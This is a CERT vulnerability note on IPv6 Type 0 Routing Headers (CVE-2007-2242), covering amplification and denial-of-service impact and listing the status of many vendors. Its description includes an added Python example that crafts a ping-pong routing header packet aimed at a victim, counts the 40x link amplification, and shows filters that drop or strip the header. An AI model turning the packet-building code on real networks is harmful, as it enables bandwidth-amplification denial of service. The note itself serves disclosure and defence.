
CERT Coordination Center

IPv6 Type 0 Route Headers allow sender to control routing

Vulnerability Note VU#267289

Original Release Date: 2007-06-01 | Last Revised: 2011-07-22

Overview

IPv6 Type 0 Route Headers allow the sender to control packet routing. This vulnerability may allow an attacker to cause a denial-of-service condition.

Description

Routing header options provided by IPv6 allow packet senders to list specific nodes through which the packet should travel; each listed node forwards the packet on to the next address in the list, and nothing prevents the same addresses from appearing in the list repeatedly. Note that a node is defined as any device that implements IPv6, which includes hosts as well as routing devices: a host that processes a Type 0 Routing Header forwards the packet even if it does not otherwise act as a router. According to FreeBSD-SA-07:03.ipv6:

An attacker can "amplify" a denial of service attack against a link between two vulnerable hosts; that is, by sending a small volume of traffic the attacker can consume a much larger amount of bandwidth between the two vulnerable hosts.

An attacker can use vulnerable hosts to "concentrate" a denial of service attack against a victim host or network; that is, a set of packets sent over a period of 30 seconds or more could be constructed such that they all arrive at the victim within a period of 1 second or less.
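The following is an added example, not code from the CERT note or the FreeBSD advisory. It builds a packet whose Type 0 Routing Header alternates between two hosts A and B before ending at a victim, counts how many times the A<->B link carries that single packet (the amplification the FreeBSD text describes), and shows the two ways a node or firewall can refuse to honour RH0: dropping a packet whose Type 0 header still has Segments Left > 0 (RFC 2460's rule for an unrecognised routing type, which RFC 5095 later mandated for RH0), or stripping the header and forwarding the rest. The addresses are constructed from the 2001:db8::/32 documentation prefix; the parser walks the Hop-by-Hop, Routing, Fragment and Destination Options extension headers with bounds checks so a truncated packet is rejected rather than misread.

```python
import struct
from ipaddress import IPv6Address

# Added example (not code from the CERT note): build, parse, filter and strip
# IPv6 Type 0 Routing Headers as laid out in RFC 2460 section 4.4.
IPV6_HDR_LEN = 40
NH_HOPOPTS, NH_ROUTING, NH_FRAGMENT, NH_DSTOPTS, NH_UDP = 0, 43, 44, 60, 17
RH_TYPE0 = 0

def build_rh0(next_header, addresses, segments_left=None):
    """RH0: 8 fixed octets (Next Header, Hdr Ext Len, Routing Type, Segments
    Left, 4 reserved) then one 16-octet address per hop. Hdr Ext Len counts
    8-octet units after the first 8, i.e. 2 per address, and is one octet."""
    packed = [IPv6Address(a).packed for a in addresses]
    if len(packed) > 127:
        raise ValueError("RH0 can list at most 127 addresses")
    if segments_left is None:
        segments_left = len(packed)   # sender normally wants every hop visited
    fixed = struct.pack("!BBBBI", next_header, 2 * len(packed), RH_TYPE0, segments_left, 0)
    return fixed + b"".join(packed)

def build_ipv6(src, dst, next_header, payload, hop_limit=64):
    """Minimal IPv6 fixed header: version 6, zero traffic class and flow label."""
    fixed = struct.pack("!IHBB", 6 << 28, len(payload), next_header, hop_limit)
    return fixed + IPv6Address(src).packed + IPv6Address(dst).packed + payload

def walk_extension_headers(packet):
    """Yield (header_type, offset, length) for each extension header before the
    upper-layer header, with bounds checks so a truncated packet cannot make
    the parser read past its end."""
    nh, off = packet[6], IPV6_HDR_LEN
    while nh in (NH_HOPOPTS, NH_ROUTING, NH_FRAGMENT, NH_DSTOPTS):
        if off + 8 > len(packet):
            raise ValueError("truncated extension header")
        # Fragment header is a fixed 8 octets; the others carry Hdr Ext Len.
        length = 8 if nh == NH_FRAGMENT else (packet[off + 1] + 1) * 8
        if off + length > len(packet):
            raise ValueError("extension header runs past end of packet")
        yield nh, off, length
        nh, off = packet[off], off + length

def parse_rh0(packet):
    """Return (segments_left, [hop addresses]) of a Type 0 Routing Header, or None."""
    for nh, off, length in walk_extension_headers(packet):
        if nh == NH_ROUTING and packet[off + 2] == RH_TYPE0:
            data = packet[off + 8:off + length]
            hops = [str(IPv6Address(data[i:i + 16])) for i in range(0, len(data), 16)]
            return packet[off + 3], hops
    return None

def rh0_verdict(packet):
    """Policy of a node that refuses to honour RH0 (RFC 2460's rule for an
    unknown routing type): Segments Left == 0 means the header is spent and
    can be ignored; Segments Left > 0 would redirect the packet, so drop it."""
    found = parse_rh0(packet)
    if found is None:
        return "pass"
    return "ignore" if found[0] == 0 else "drop"

def link_crossings(first_hop, hops, a, b):
    """Times the a<->b link carries the packet when the attacker addresses it
    to first_hop and RH0 lists `hops` as the remaining destinations."""
    path = [IPv6Address(x) for x in [first_hop, *hops]]
    link = {IPv6Address(a), IPv6Address(b)}
    return sum(1 for x, y in zip(path, path[1:]) if {x, y} == link)

def strip_rh0(packet):
    """Firewall-style sanitising: cut the RH0 out, point its predecessor's Next
    Header at what followed it and fix Payload Length. Unchanged if no RH0."""
    prev_nh_at = 6                      # Next Header field of the fixed header
    for nh, off, length in walk_extension_headers(packet):
        if nh == NH_ROUTING and packet[off + 2] == RH_TYPE0:
            out = bytearray(packet[:off] + packet[off + length:])
            out[prev_nh_at] = packet[off]
            struct.pack_into("!H", out, 4, len(out) - IPV6_HDR_LEN)
            return bytes(out)
        prev_nh_at = off                # this header's own Next Header field
    return packet

if __name__ == "__main__":
    # Constructed sample addresses from the 2001:db8::/32 documentation prefix.
    attacker, a, b, victim = "2001:db8::bad", "2001:db8:1::a", "2001:db8:2::b", "2001:db8:3::dead"
    hops = [b, a] * 20 + [victim]       # ping-pong across A<->B, then hit the victim
    pkt = build_ipv6(attacker, a, NH_ROUTING, build_rh0(NH_UDP, hops) + b"x" * 64)
    print(f"{len(pkt)} bytes sent once; the A<->B link carries them "
          f"{link_crossings(a, hops, a, b)} times")
    print("inbound:", rh0_verdict(pkt), "| after strip:", rh0_verdict(strip_rh0(pkt)))
```

With 40 alternating entries the attacker's single 768-byte packet crosses the A<->B link 40 times, so the bandwidth consumed on that link is 40 times what the attacker transmitted; the one-octet Hdr Ext Len caps the list at 127 addresses, which bounds the factor a single packet can reach. The stripping variant is what a firewall in the forwarding path can do when it must not break the rest of the datagram; the drop variant is the host-side behaviour.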

Impact

This condition can facilitate a number of different impacts, including packet amplification, bypassing filtering devices, denial of service, and defeating IPv6 Anycast.

Solution

Update

Apply the updates listed in the Vendor Information section of this document. Several vendor statements in that section also describe discarding or stripping Type 0 Routing Headers at hosts and firewalls, which limits exposure where an update is not yet available.

Vendor Information


Apple Computer, Inc. Affected

Notified:  May 09, 2007 Updated: June 21, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to Apple Mac OS X 10.4.10 Update.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

Cisco Systems, Inc. Affected

Notified:  May 09, 2007 Updated: May 15, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

FreeBSD, Inc. Affected

Updated:  May 14, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to FreeBSD-SA-07:03.ipv6.

Fujitsu Affected

Notified:  May 09, 2007 Updated: June 15, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://software.fujitsu.com/jp/security/vulnerabilities/vu267289.html.

Hitachi Affected

Notified:  May 09, 2007 Updated: May 14, 2007

Status

Affected

Vendor Statement

AlaxalA AX series (except AX1200S/AX2400S series) and Hitachi GR4000/GR2000/GS4000/GS3000 are vulnerable to this issue. Note that AlaxalA AX series (except AX1200S/AX2400S series) and Hitachi GR4000/GR2000/GS4000/GS3000 have a threshold mechanism to ignore IPv6 Routing Header Type 0. This mechanism limits the impact of possible attacks.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Internet Initiative Japan Affected

Updated:  May 14, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://www.seil.jp/en/news/snote/snote_200705_01_en.html

NEC Corporation Affected

Notified:  May 09, 2007 Updated: June 15, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://www.nec.co.jp/psirt/index.html (Japanese only).

OpenBSD Affected

Updated:  May 14, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to http://openbsd.org/errata40.html#012_route6.

Red Hat, Inc. Affected

Updated:  May 17, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to RHSA-2007-0347.

Secure Computing Network Security Division Affected

Notified:  May 09, 2007 Updated: June 15, 2007

Status

Affected

Vendor Statement

Sidewinder G2, Sidewinder 7, and TSP: Not Vulnerable

By default, Sidewinder ignores routing header 0, and strips it from datagrams passing through the firewall.

TSP drops IPv6 datagrams containing routing headers.

SnapGear: Vulnerable

SnapGear products at version 3.1.5 and earlier honor IPv6 routing header 0. This will be corrected in an upcoming release.

This vulnerability is not relevant to any other Secure Computing products.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Sun Microsystems, Inc. Affected

Notified:  May 09, 2007 Updated: May 17, 2007

Statement Date:   May 16, 2007

Status

Affected

Vendor Statement

Sun can confirm that while Solaris has support for the IPv6 Routing Header type 0 that is described in VU#267289, packets containing this header extension are discarded by default on Solaris 9 and 10, and Solaris 8 can be configured to discard them by setting a kernel driver parameter.

For Solaris systems, this setting is controlled by the ip6_forward_src_routed kernel driver parameter, which defaults to 1 on Solaris 8 systems, and 0 on later systems. The 'ndd(1M)' command can be used to set this variable, for example to set it for the current session the command could be used as follows:

# ndd -set /dev/ip ip6_forward_src_routed 0

More details are available from the following blog post:

http://blogs.sun.com/security/entry/ipv6_routing_header_issues

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

rPath Affected

Updated:  June 21, 2007

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Refer to rPSA-2007-0124-1.

Force10 Networks, Inc. Not Affected

Notified:  May 09, 2007 Updated: July 22, 2011

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Novell, Inc. Not Affected

Notified:  May 09, 2007 Updated: May 17, 2007

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

3com, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

AT&T Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Alcatel Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Avaya, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Avici Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Borderware Technologies Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Charlotte's Web Networks Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Check Point Software Technologies Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Chiaro Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Clavister Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Computer Associates Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Cray Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

D-Link Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Data Connection, Ltd. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

EMC, Inc. (formerly Data General Corporation) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Ericsson Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Extreme Networks Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

F5 Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Fortinet, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Foundry Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Global Technology Associates Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hewlett-Packard Company Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hyperchip Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation (zseries) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM eServer Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IP Filter Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Ingrian Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intel Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Internet Security Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intoto Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Juniper Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Linksys (A division of Cisco Systems) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Lucent Technologies Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Luminous Networks Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Microsoft Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

MontaVista Software, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Multinet (owned Process Software Corporation) Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Multitech, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

NetBSD Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Network Appliance, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

NextHop Technologies, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Nokia Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Nortel Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

QNX, Software Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Redback Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Riverstone Networks, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Secureworx, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Silicon Graphics, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Sony Corporation Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Stonesoft Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Symantec, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

The SCO Group Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Unisys Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Watchguard Technologies, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Wind River Systems, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

ZyXEL Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

eSoft, Inc. Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

netfilter Unknown

Notified:  May 09, 2007 Updated: May 09, 2007

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Acknowledgements

This vulnerability was reported by Philippe Biondi and Arnaud Ebalard of EADS Innovation Works (IW/SE/CS, IT Sec lab, Suresnes, France) at CanSecWest 2007.

This document was written by Chris Taschner.

Other Information

CVE IDs: CVE-2007-2242
Severity Metric: 11.03
Date Public: 2007-04-24
Date First Published: 2007-06-01
Date Last Updated: 2011-07-22 12:54 UTC
Document Revision: 39

Sponsored by CISA.